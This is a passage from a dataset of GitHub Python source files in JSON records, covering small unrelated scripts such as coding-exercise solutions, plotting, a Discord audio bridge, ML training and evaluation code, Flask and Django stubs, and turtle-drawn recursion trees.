True sound will\n have left and right stereo channels.\n\n Returns:\n A dictionary representing that sound.\n \"\"\"\n sound_file = wave.open(filename, \"r\")\n chan, bd, sr, count, _, _ = sound_file.getparams()\n\n assert bd == 2, \"only 16-bit WAV files are supported\"\n\n out = {\"rate\": sr}\n\n left = []\n right = []\n for i in range(count):\n frame = sound_file.readframes(1)\n if chan == 2:\n left.append(struct.unpack(\" int:\n res = 0\n for i in range(1, len(timeSeries)):\n res += min(duration, timeSeries[i] - timeSeries[i-1])\n if len(timeSeries) > 0:\n res += duration\n return res\n\nprint(Solution().findPoisonedDuration([1,2,3,4,5,6,7,8,9], 1))","repo_name":"ZhikunWei/daily_oj","sub_path":"20211110-495.py","file_name":"20211110-495.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18505762630","text":"# Write a program that takes a list of numbers (for example, a = [5, 10, 15, 20, 25]) and makes a new list of only the first and last elements of the given list. For practice, write this code inside a function.\n\n\n\ndef list_end():\n a = [5,10,15,20,25]\n new_list = []\n new_list.append(a[0])\n new_list.append(a[-1])\n return new_list\n \n\nif __name__ == \"__main__\":\n b = list_end()\n print(b)\n\n\n","repo_name":"Netra-Bahadur-khatri/Python_dajngo_By_Ranbindra_Joshi","sub_path":"12_ListsEnd.py","file_name":"12_ListsEnd.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2773650075","text":"import sys\nimport math\nimport pylab\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys,argparse\n\n\ncl = ['red','blue','green']\nll =['10%','30%','50%']\ntrt = []\nacfrt = []\ntft = []\nacfft = []\nfor i in [1,3,5]:\n\tf = open(str(i)+\".out\",'r')\n\tg = open(\"fit.kww.\"+str(i)+\".out\",'r')\n\tlinesf = f.readlines()\n\tlinesg = g.readlines()\n\tf.close()\n\tg.close()\n\tlinesf = linesf[1:]\n\tlinesf = np.asarray([line.split() for line in linesf])\n\ttr = np.asarray(map(lambda x: float(x), linesf[:,0]))\n\tacfr = np.asarray(map(lambda x: float(x), linesf[:,1]))\n\ttrt.append(tr)\n\tacfrt.append(acfr)\n\t\n\tlinesg = linesg[1:]\n\tlinesg = np.asarray([line.split() for line in linesg])\n\ttf = np.asarray(map(lambda x: float(x), linesg[:,0]))\n\tacff = np.asarray(map(lambda x: float(x), linesg[:,1]))\n\ttft.append(tf)\n\tacfft.append(acff)\nfs = 20\t\nfor i in range(3):\n\tplt.plot(trt[i][:(len(trt)-40)],acfrt[i][:(len(trt)-40)],color=cl[i],label = ll[i],alpha=1,linewidth=2)\n\tplt.plot(tft[i],acfft[i],color=cl[i],linestyle='--',linewidth=2)\nplt.yticks(fontsize=fs)\nplt.xticks(fontsize=fs)\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylim([0.3,1.2])\nplt.yticks([0.5,1],[0.5,1])\nplt.xlabel(\"time/ns\",fontsize=fs)\nplt.ylabel(\"ACF\",fontsize=fs)\nplt.tight_layout()\nplt.legend(loc='lower left',fontsize=fs)\nplt.show()\n","repo_name":"weiweichu/analysis-tool","sub_path":"compsingleplot.py","file_name":"compsingleplot.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73130831577","text":"import uuid\nfrom django.utils import timezone\nfrom django.db import models\nfrom datetime import date\nfrom ..utils import get_thumbnail\n\nclass Movie(models.Model):\n CATEGORY = (\n (0, '其他'),\n (1, '爱情'),\n (2, '恐怖'),\n (3, '悬疑'),\n (4, '冒险'),\n (5, '喜剧'),\n (6, '动作'),\n (7, '科幻'),\n (8, '综艺'),\n (9, '动漫'),\n (10, '卡通'),\n (11, 'LGBT')\n )\n AREA = (\n (0, '中国'),\n (1, '美国'),\n (2, '英国'),\n (3, '韩国'),\n (4, '日本'),\n (5, '泰国'),\n (6, '马来西亚'),\n )\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n title = models.CharField(max_length=150)\n description = models.TextField(max_length=5000)\n img = models.ImageField(upload_to=\"uploads/movies\", blank=True)\n thumbnail = models.ImageField(upload_to=\"uploads/movies\", blank=True)\n director = models.CharField(max_length=150)\n actor = models.CharField(max_length=150)\n year = models.DateField(default=date(2000, 1, 1))\n category = models.IntegerField(choices=CATEGORY,null=False, blank=False,default=0)\n area = models.IntegerField(choices=AREA,null=False, blank=False,default=0)\n createdAt = models.DateTimeField(default=timezone.now)\n updatedAt = models.DateTimeField(default=timezone.now)\n \n def save(self, *args, **kwargs):\n if self.img:\n # ratio 3:4 0.75\n self.img = get_thumbnail(self.img, 100, False, 0.75) # quality = 100, isThumbnail False = maxWidthHeight = 1024px\n self.thumbnail = get_thumbnail(self.img, 100, True, 0.75) # quality = 100, isThumbnail False = maxWidthHeight = 256px\n super(Movie, self).save(*args, **kwargs)","repo_name":"CheangFouSUY/api-yueying","sub_path":"api/models/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"1685638773","text":"\"\"\"\r\nUnlike threading, mulitprocessing can assist in speeding up cpu bound tasks. I/O bound tasks include file system and networking tasks i.e. https requests, file output/input,\r\nand more... can also be sped up using multiprocessing\r\n\"\"\"\r\nimport time\r\nimport multiprocessing\r\nimport concurrent.futures\r\n\r\n# calc start time\r\nstart = time.perf_counter()\r\n\r\n\r\ndef do_something(seconds):\r\n print(f'Sleeping for {round(seconds, 2)} second(s)...')\r\n time.sleep(seconds)\r\n print('Done Sleeping...')\r\n\r\nwith concurrent.futures.ProcessPoolExecutor() as executor:\r\n secs = [5, 4, 3, 2, 1]\r\n results = [executor.submit(do_something, secs) for sec in secs]\r\n\r\n for f in concurrent.futures.as_completed(results):\r\n print(f.result())\r\n\r\n\r\n# pass the actual value of the function not the return value which is denoted by ()\r\n# p1 = multiprocessing.Process(target=do_something)\r\n# p2 = multiprocessing.Process(target=do_something)\r\n\r\n# In order to run the code use .start() to run the initialized variables p1 & p2\r\n# p1.start()\r\n# p2.start()\r\n\r\n# In order to actually run the process before moving down in the script we use the join() method.\r\n# p1.join()\r\n# p2.join()\r\n\r\n# Instead of entering each value manually for to loop over a range of processes\r\n# Underscore is a throw away variable.\r\n# nterms = int(input('Please input and integer range to loop over:'))\r\n#\r\n# processes = []\r\n#\r\n# for _ in range(nterms):\r\n# p = multiprocessing.Process(target=do_something, args=[1.5])\r\n# p.start()\r\n# processes.append(p)\r\n#\r\n# for process in processes:\r\n# process.join()\r\n\r\n\r\n# Check that you understand synchronous code call the do_something() func twice\r\n# do_something()\r\n# do_something()\r\n\r\n# calc finish time\r\nfinish = time.perf_counter()\r\n\r\nprint(f'Finished in {round(finish - start, 2)} second(s)')\r\n","repo_name":"tucker517/Python","sub_path":"Py_Projects/Learning_Modules/Multiprocessing/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15015925641","text":"#!/usr/bin/env python3\n\nimport argparse\nimport asyncio\nimport os\nimport sys\n\nimport discord\nimport numpy as np\nimport sounddevice as sd\n\n\nclass SoundDeviceSource(discord.AudioSource):\n def __init__(self, device):\n self.stream = sd.InputStream(samplerate=48000,\n channels=1,\n device=device,\n dtype='int16',\n latency='low')\n self.stream.start()\n\n def is_opus(self):\n return False\n\n def read(self):\n (data, _) = self.stream.read(960)\n data = np.repeat(data, 2, 1)\n return data.data.tobytes()\n\n def cleanup(self):\n self.stream.stop()\n\n\nclass VoxSource(discord.AudioSource):\n def __init__(self, source):\n self.source = source\n\n self.active = False\n self.threshold = 16\n self.duration = 25\n self.silent_for = 0\n\n if self.source.is_opus():\n raise ValueError(\"cannot use VoxSource with an Opus source\")\n\n self.voice = None\n self.task = None\n\n def is_opus(self):\n return self.source.is_opus()\n\n def read(self):\n data = self.source.read()\n\n if self.active:\n if max(data) < self.threshold:\n self.silent_for += 1\n if self.silent_for >= self.duration:\n print('VOX off')\n self.active = False\n return bytes([])\n else:\n self.silent_for = 0\n\n return data\n\n def cleanup(self):\n pass\n\n async def on_vox(self):\n loop = asyncio.get_running_loop()\n while True:\n start_time = loop.time()\n if not self.active:\n data = self.read()\n if max(data) >= self.threshold:\n print('VOX on')\n self.active = True\n self.voice.play(self)\n\n await asyncio.sleep(loop.time() - start_time + 0.002)\n\n def start_vox(self, voice):\n self.voice = voice\n self.task = asyncio.create_task(self.on_vox())\n\n def stop_vox(self):\n self.task.cancel()\n\n\nclass AudioPatchClient(discord.Client):\n def __init__(self, channel, guild=None, input_device=sd.default.device[0]):\n super().__init__()\n\n try:\n input_device = int(input_device)\n except ValueError:\n pass\n real_source = SoundDeviceSource(device=input_device)\n self.source = VoxSource(real_source)\n\n try:\n self.channel_id = int(channel)\n except ValueError:\n self.channel_id = None\n self.channel_name = channel\n self.guild = guild\n\n self.voice = None\n\n async def on_ready(self):\n print(\"Logged on as\", self.user)\n\n if self.channel_id is not None:\n channel = self.get_channel(self.channel_id)\n else:\n channel = None\n for guild in self.guilds:\n if self.guild and guild.name != self.guild:\n continue\n for guild_channel in guild.voice_channels:\n if guild_channel.name == self.channel_name:\n channel = guild_channel\n break\n if not channel:\n print(\"{0}: error: can't find channel '{1}'\"\n .format(sys.argv[0], self.channel_id),\n file=sys.stderr)\n sys.exit(1)\n\n self.voice = await channel.connect()\n print(\"Connected to voice channel\", self.voice.channel.name)\n\n self.source.start_vox(self.voice)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Patch a pair of audio devices to a Discord voice channel\")\n parser.add_argument('channel', metavar='CHANNEL', nargs='?',\n help=\n \"voice channel to patch (channel ID or name)\")\n parser.add_argument('--guild',\n default=None,\n help=\"guild name\")\n parser.add_argument('--token',\n default=os.environ.get('DISCORD_TOKEN', None),\n help=\"Discord token (default: $DISCORD_TOKEN)\")\n parser.add_argument('--input',\n default=sd.default.device[0],\n help=\"input audio device (ID or name)\")\n parser.add_argument('--list-devices', action='store_true',\n help=\"list audio devices\")\n args = parser.parse_args()\n\n if args.list_devices:\n print('Input devices:')\n device_id = 0\n for device in sd.query_devices():\n if device['max_input_channels'] > 0:\n print(' {0}:'.format(device_id), device['name'])\n device_id += 1\n print()\n sys.exit(0)\n\n if not args.token:\n print(\"{0}: error: --token or $DISCORD_TOKEN required\".format(sys.argv[0]),\n file=sys.stderr)\n sys.exit(1)\n\n if args.channel is None:\n print(\"{0}: error: CHANNEL required\".format(sys.argv[0]),\n file=sys.stderr)\n sys.exit(1)\n\n client = AudioPatchClient(channel=args.channel,\n guild=args.guild,\n input_device=args.input)\n client.run(args.token)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"franrogers/discord-audio-patch","sub_path":"audio_patch.py","file_name":"audio_patch.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805535361","text":"import argparse\n\nimport json\nimport torch\n\nfrom utils.dataloader import load_dataset\nfrom modules.autoencoder import Autoencoder\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\nCONFIG_DIR = \"./configs/\"\n\n\ndef train(args):\n config = json.load(open(CONFIG_DIR + args.config, 'r'))\n data = args.data\n validation = args.validation\n\n lr = config[\"training\"][\"lr\"]\n epochs = config[\"training\"][\"epochs\"]\n batch = config[\"training\"][\"batch_size\"]\n\n if args.epochs:\n epochs = args.epochs\n if args.batch:\n batch = args.batch\n if args.lr:\n lr = args.lr\n\n print(\"### Loading data ###\")\n train_loader = load_dataset(data, batch, is_train=True)\n if validation:\n valid_loader = load_dataset(data, batch, is_train=not(validation))\n else:\n valid_loader = None\n print(\"### Loaded data ###\")\n\n model = Autoencoder(\n device=DEVICE,\n config=config\n )\n model.to(DEVICE)\n model.fit(train_loader, lr, epochs, validloader=valid_loader)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--data',\n type=str,\n default=\"mnist\",\n help=\"Load dataset specified. mnist(default) or cifar.\")\n parser.add_argument(\"--validation\",\n action=\"store_true\",\n help=\"Specify if you want to use validation set.\")\n parser.add_argument('--config',\n type=str,\n default=\"MNIST/all_TT.json\",\n help=\"Path to config file, all_TT.json as default.\")\n parser.add_argument('--lr',\n type=float,\n default=None)\n parser.add_argument('--epochs',\n type=int,\n default=None)\n parser.add_argument('--batch',\n type=int,\n default=None)\n args = parser.parse_args()\n train(args)\n","repo_name":"jimleroux/TT-DCGAN","sub_path":"train_ae.py","file_name":"train_ae.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11554404054","text":"# https://www.acmicpc.net/problem/2720\n\nT = int(input())\n\ncheck_list = [25, 10, 5, 1]\n\nfor i in range(T):\n C = int(input())\n\n for j in check_list:\n print(C // j, end=\" \")\n\n C = C % j\n\n print()","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_2720.py","file_name":"baekjoon_2720.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797431206","text":"#!/usr/bin/env python3\n\nfrom collections import deque\n\n\nclass Solution:\n def shortestPathBinaryMatrix(self, grid: list[list[int]]) -> int:\n height = len(grid)\n width = len(grid[0])\n dist = [[-1] * width for i in range(height)]\n to_see = deque([(height - 1, width - 1)]) if grid[height -1][height -1] == 0 else None\n dist[height - 1][width - 1] = 1 if to_see else -1\n while (to_see):\n i,j = to_see.pop()\n for i1, j1 in [(i + 1,j), (i, j + 1), (i- 1, j), (i, j-1), (i-1, j-1), (i+1,j+1), (i-1,j+1), (i+1,j-1)]:\n if 0 <= i1 < height and 0 <= j1 < width and dist[i1][j1] < 0 and grid[i1][j1] == 0:\n dist[i1][j1] = dist[i][j] + 1\n if (i1 == 0 and j1 == 0):\n return dist[0][0]\n to_see.appendleft((i1,j1))\n# [print(i) for i in dist]\n return dist[0][0]\n\nsol = Solution()\ngrid = [[0,0,0],[1,1,0],[1,1,0]]\ngrid = [[0,1],[1,0]]\ngrid = [[1,0,0],[1,1,0],[1,1,0]]\nprint(sol.shortestPathBinaryMatrix(grid))","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/shortest_path_in_binary_matrix/main_bfs.py","file_name":"main_bfs.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19214052685","text":"from data import *\nfrom configs import *\nfrom loss import *\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\nfrom sklearn.metrics import auc, roc_curve, precision_score, recall_score, f1_score, precision_recall_curve, accuracy_score, confusion_matrix, ConfusionMatrixDisplay\n\nnp.random.seed(101)\ntf.random.set_seed(101)\n\n(train_images, train_masks), (val_images, val_masks), (test_images, test_masks) = split_data(PATH)\n\nprint(f'Testing Data: {len(test_images)}')\n\ntest_dataset = test_data(test_images, test_masks)\n\ndef evaluate(MODEL):\n\tcustom_objects={'dice_coef':dice_coef, 'bce_dice_loss':bce_dice_loss}\n\tmodel = load_model(MODEL, custom_objects=custom_objects)\n\tall_true_masks = []\n\tall_pred_masks = []\n\tfor image, mask in test_dataset:\n\t\tpred_mask = model.predict(image)\n\t\tpred_mask = np.squeeze(pred_mask, -1)\n\t\ttrue_mask = np.squeeze(mask, -1)\n\t\tall_pred_masks.append(pred_mask)\n\t\tall_true_masks.append(true_mask)\n\tflat_true_masks = [item for sublist in all_true_masks for item in sublist]\n\tflat_pred_masks = [item for sublist in all_pred_masks for item in sublist]\n\ttrue_masks = np.array(flat_true_masks)\n\tpred_masks = np.array(flat_pred_masks)\n\n\tfpr, tpr, thresholds = roc_curve(true_masks.ravel(), pred_masks.ravel(), pos_label=1)\n\tauc_ = auc(fpr, tpr)\n\tp = precision_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tr = recall_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tf1_ = f1_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tp_ , r_ , _ = precision_recall_curve(true_masks.ravel(), pred_masks.ravel())\n\tacc = accuracy_score(true_masks.ravel(), pred_masks.ravel().round())\n\tc = confusion_matrix(true_masks.ravel(), pred_masks.ravel().round(), normalize='all')\n\tmodel_name = MODEL.split('/')[-1].split('.')[-2]\n\tprint(f\"Model Name: {model_name}\\n\")\n\tprint(f'Precision = {p}\\nRecall = {r}\\nF1 Score = {f1_}\\nAUC = {auc_}\\nACC = {acc}')\n\treturn model_name, p, r, f1_, fpr, tpr, auc_, p_, r_, acc, c\n\n\n","repo_name":"sineagles/Concrete-Crack-Segmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14827184436","text":"n=int(input())\r\nscore=list(map(int,input().split()))\r\nbest=score[0]\r\nworst=score[0]\r\nbest_count=0\r\nworst_count=0\r\nfor i in range(1,n):\r\n if(score[i]>best):\r\n best=score[i]\r\n best_count+=1\r\n elif(score[i]Bla

\"\n\n\ndef test_write_pdf():\n data = write_report(\"

Test

\")\n assert len(data) > 100\n\n\ndef test_basics(tmpdir):\n template_path = os.path.join(\"tests\", \"data\", \"example_template.pug\")\n assert os.path.exists(template_path)\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n html = pug_to_html(template_path, title=\"Summary of your order\")\n write_report(html, pdf_path)\n with open(pdf_path, \"rb\") as f:\n reader = PdfReader(f)\n assert len(reader.pages) == 2\n\n pdf_data = write_report(html)\n assert len(pdf_data) > 10000\n\n\ndef test_with_plots_and_tables(tmpdir):\n template_path = os.path.join(\"tests\", \"data\", \"with_plots_and_tables.pug\")\n assert os.path.exists(template_path)\n\n dataframe = pandas.DataFrame.from_records(\n {\n \"Name\": [\"Anna\", \"Bob\", \"Claire\", \"Denis\"],\n \"Age\": [12, 22, 33, 44],\n \"Height (cm)\": [140, 175, 173, 185],\n },\n columns=[\"Name\", \"Age\", \"Height (cm)\"],\n )\n\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n html = pug_to_html(template_path, dataframe=dataframe)\n write_report(html, pdf_path)\n with open(pdf_path, \"rb\") as f:\n reader = PdfReader(f)\n assert len(reader.pages) == 2\n\n pdf_data = write_report(html)\n assert len(pdf_data) > 10000\n\n\ndef test_preload_stylesheet(tmpdir):\n css = preload_stylesheet(os.path.join(\"tests\", \"data\", \"style.scss\"))\n html = pug_to_html(string=\"p {{ var }}\", var=\"Bla\")\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n write_report(html, pdf_path, extra_stylesheets=[css])\n\n\ndef test_ReportWriter(tmpdir):\n report_writer = ReportWriter(\n default_template=os.path.join(\"tests\", \"data\", \"template_rw.pug\"),\n title=\"My default title\",\n version=\"0.1.2\",\n )\n html = report_writer.pug_to_html(my_name=\"Zulko\", my_organization=\"EGF\")\n report_writer.write_report(html, os.path.join(str(tmpdir), \"test_rw.pdf\"))\n","repo_name":"Edinburgh-Genome-Foundry/pdf_reports","sub_path":"tests/test_basics.py","file_name":"test_basics.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"53"} +{"seq_id":"7709791446","text":"from flask import Flask, jsonify, request, render_template\n\napp = Flask(__name__)\n\n@app.get('/')\ndef home():\n return '

Integration service for Zendesk

'\n\n\n@app.post('/admin_ui')\ndef admin_ui():\n return_url = request.form.get('return_url')\n return render_template('admin_ui.html', return_url=return_url)\n\n@app.post('/pull')\ndef pull():\n\n test_data = {\n \"external_resources\": {\n \"external_id\": \"123456789_test\",\n \"message\": \"Please help. My printer is on fire.\",\n \"html_message\": \"Please help. My printer is on fire.\",\n \"created_at\": \"2023-02-06T22:48:09Z\",\n \"author\": {\n \"external_id\": \"FakeUserID\",\n \"name\": \"James Bon\",\n \"locale\": \"en-US\"\n },\n \"allow_channelback\": True\n }\n }\n\n return jsonify(test_data), 200\n\n@app.post('/channelback')\ndef channelback():\n return 'OK'\n\n@app.get('/manifest')\ndef manifest():\n glitch_url = 'https://zendeskpython.glitch.me'\n data = {\n \"name\": \"Zendesk Python\",\n \"id\": \"my-zendesk-python\",\n \"version\": \"1.0.0\",\n \"urls\": {\n \"admin_ui\": f\"{glitch_url}/admin_ui\",\n \"pull_url\": f\"{glitch_url}/pull\",\n \"channelback_url\": f\"{glitch_url}/channelback\"\n }\n }\n return data\n\nif __name__ == '__main__':\n app.run()","repo_name":"brunotatsuya-apptweak/zpt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70949165927","text":"import requests, json\nimport streamlit as st\nimport settings as set\n\n\ndef search_by_id(\n id,\n host=set.host_url + \"data/\",\n):\n response = requests.get(host + id)\n if response.status_code == 200:\n content_type = response.headers.get('Content-Type')\n if 'charset' in content_type.lower():\n encoding = content_type.split('charset=')[-1]\n data = response.content.decode(encoding)\n # 对data进行处理\n else:\n data = response.content.decode()\n # 对data进行处理\n data_list = json.loads(data)\n return data_list[\"results\"]\n else:\n print('Error:', response.status_code)\n return None\n\n\nif __name__ == '__main__':\n st.title(\"Tanglab-Digital-Decoder-WebUI\")\n st.caption('made by [Yida](https://github.com/DF-Master) --230330 update!',\n unsafe_allow_html=True)\n\n with st.container():\n status = st.radio('Choose Status: ',\n ('Run Out', 'Never Used', 'Available', 'Occupied'),\n key=\"status\")\n url_dic = {\n 'Run Out': 'update-runout/',\n 'Never Used': 'update-neverused/',\n 'Available': 'update-available/',\n 'Occupied': 'update-occupied/'\n }\n\n def on_input():\n id_value = st.session_state.id\n if len(id_value) >= 6:\n try:\n results_list = search_by_id(id_value)\n st.write(results_list)\n uuid = results_list[0][\"id\"]\n st.session_state.id = \"\"\n response = requests.get(set.host_url + url_dic[status] +\n uuid)\n except:\n st.write(\"Search ID Failed\")\n\n id = st.text_input('ID(>= 6 num)',\n value='',\n key=\"id\",\n on_change=on_input)\n","repo_name":"DF-Master/tanglabdata","sub_path":"printer/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27273930214","text":"#!/bin/python3\n\nimport sys\ninput = sys.stdin.readline\n\ndef main():\n is_prime = [True] * 10001\n for i in range(2, 10000):\n for j in range(i*2, 10000, i):\n is_prime[j] = False\n\n is_prime[1] = False\n\n result = 0\n for _ in range(20):\n arr = list(map(int, input().strip().split()))\n for num in arr:\n if is_prime[num]:\n result += 1\n print(result)\n\nmain()\n","repo_name":"hiromichinomata/zone-energy","sub_path":"question2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39501085803","text":"# -*- coding: utf-8 -*-\r\n# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_csv(\"house_rental_data.csv.txt\")\r\nprint(df.head(),\"\\n\")\r\nprint(\"Data types are: \",df.dtypes,\"\\n\")\r\nprint(\"Shape of dataframe is: \\n\",df.shape,\"\\n\")\r\nprint(\"Columns are: \\n\",df.columns,\"\\n\")\r\nprint(\"Checking for missing values:\\n\",df.isnull().sum(),\"\\n\")\r\n\r\ndel df[\"Unnamed: 0\"]\r\nprint(\"Coumns are: \\n\",df.columns,\"\\n\")\r\n\r\ncorr = df.corr()\r\n\r\nx = df.iloc[:,0:6].values\r\n\r\nwcss = []\r\nfor i in range(1, 15):\r\n k_means = KMeans(n_clusters = i, init = \"k-means++\", random_state = 1)\r\n k_means.fit_predict(x)\r\n #k_means.inertia_ : wcss score\r\n wcss.append(k_means.inertia_)\r\n print(\"i:\",i,\"wcss:\", k_means.inertia_)\r\n\r\nplt.plot(range(1, 15), wcss)\r\nplt.title(\"Elbow Method\")\r\nplt.xlabel(\"No. of clusters\")\r\nplt.ylabel(\"WCSS Score\")\r\nplt.show()\r\n\r\nk_means = KMeans(n_clusters = 5, init = \"k-means++\", random_state = 1)\r\nprint(k_means.fit_predict(x))","repo_name":"Aditya-Malik/Edyoda-Assignments","sub_path":"kMean_clustering.py","file_name":"kMean_clustering.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35355623537","text":"from __future__ import print_function\n\nimport argparse\nimport logging\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn\nimport os\nimport numpy as np\nimport json\nimport time\nimport pandas\n\nfrom spam_model import train, save\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n # hyperparameters sent by the client are passed as command-line arguments to the script.\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--batch-size', type=int, default=100)\n parser.add_argument('--learning-rate', type=float, default=0.01)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--log-interval', type=int, default=200)\n\n # an alternative way to load hyperparameters via SM_HPS environment variable.\n parser.add_argument('--sm-hps', type=json.loads, default=os.environ['SM_HPS'])\n\n # input data and model directories\n parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR'])\n parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN'])\n parser.add_argument('--val', type=str, default=os.environ['SM_CHANNEL_VAL'])\n\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\n\n return parser.parse_args()\n\n\nif __name__ =='__main__':\n args = parse_args()\n logger.info(f'Args: \\n\\n{args}')\n \n num_cpus = int(os.environ[\"SM_NUM_CPUS\"])\n num_gpus = int(os.environ[\"SM_NUM_GPUS\"])\n\n net = train(\n args.current_host,\n args.hosts,\n num_cpus,\n num_gpus,\n args.train,\n args.val,\n args.model_dir,\n args.batch_size,\n args.epochs,\n args.learning_rate,\n args.momentum,\n args.log_interval\n )\n\n save(net, args.model_dir)\n","repo_name":"tmmunroe/spam-detection","sub_path":"sagemaker_model/docker/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28402971633","text":"import quopri\n\nfrom imaplib import IMAP4_SSL\nfrom common import Auth\nfrom settings import IMAP_HOST, IMAP_PORT\n\n\nclass Collector(Auth):\n IMAP_HOST = IMAP_HOST\n IMAP_PORT = IMAP_PORT\n\n def __init__(self):\n self.success = \"success_request.log\"\n self.error = \"error_request.log\"\n\n def check_correct_letter(self):\n with IMAP4_SSL(host=IMAP_HOST, port=IMAP_PORT) as M:\n rc, resp = M.login(self.EMAIL, self.PASSWORD)\n M.select()\n typ, data = M.search(None, 'ALL')\n for num in data[0].split():\n typ, data = M.fetch(num, '(RFC822)')\n mail = quopri.decodestring(data[0][1]).decode(\"utf-8\", errors=\"ignore\")\n self.search_ticket_mail(mail)\n\n @staticmethod\n def search_ticket_mail(data: str):\n lst_data = list(filter(lambda x: len(x) > 1, data.split(\"\\n\")))\n for entry in lst_data:\n if \"Ticket\" in entry:\n ID = \"\".join([symb for symb in entry if symb.isdigit()])\n with open(\"success_request.log\", \"a\") as file:\n file.write(f\"ID: {ID} - Message: {lst_data[-1]}\\n\")\n return\n\n with open(\"error_request.log\", \"a\") as file:\n file.write(f\"Error - {lst_data[-1]}\\n\")\n\n\ncollector = Collector()\ncollector.check_correct_letter()","repo_name":"xp-rodion/miet-python","sub_path":"lab7/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17819785230","text":"\"\"\"\n20200913\n\nRecursion Trees\n\n\"\"\"\nimport turtle\n\n\ndef recursion_tree_v1(\n length=100, l_angle=20, r_angle=50, n=6, p_l=0.8, p_a=0.7\n):\n \"\"\"Recursion Tree v1.\n\n Args:\n length (float, optional): the length of first branch. Defaults to 100.\n l_angle (float, optional): left branch angle. Defaults to 20.\n r_angle (float, optional): right branch angle. Defaults to 50.\n n (int, optional): number of loops. Defaults to 6.\n p_l (float, optional): length changer (percentage). Defaults to 0.8.\n p_a (float, optional): angle changer (percentage). Defaults to 0.7.\n \"\"\"\n\n if n == 0:\n return\n turtle.forward(length)\n turtle.left(l_angle)\n recursion_tree_v1(\n length * p_l, l_angle * p_a, r_angle * p_a, n=n - 1, p_l=p_l, p_a=p_a\n )\n turtle.right(r_angle + l_angle)\n recursion_tree_v1(\n length * p_l, l_angle * p_a, r_angle * p_a, n=n - 1, p_l=p_l, p_a=p_a\n )\n\n turtle.penup()\n turtle.left(r_angle)\n turtle.backward(length)\n turtle.pendown()\n\n\ndef recursion_tree_v2(length=100, angle=100, n=6, b=4, p_l=0.7, p_a=0.7):\n \"\"\"Recursion Tree v2.\n\n Args:\n length (float, optional): the length of first branch. Defaults to 100.\n angle (float, optional): tree crown angle. Defaults to 100.\n n 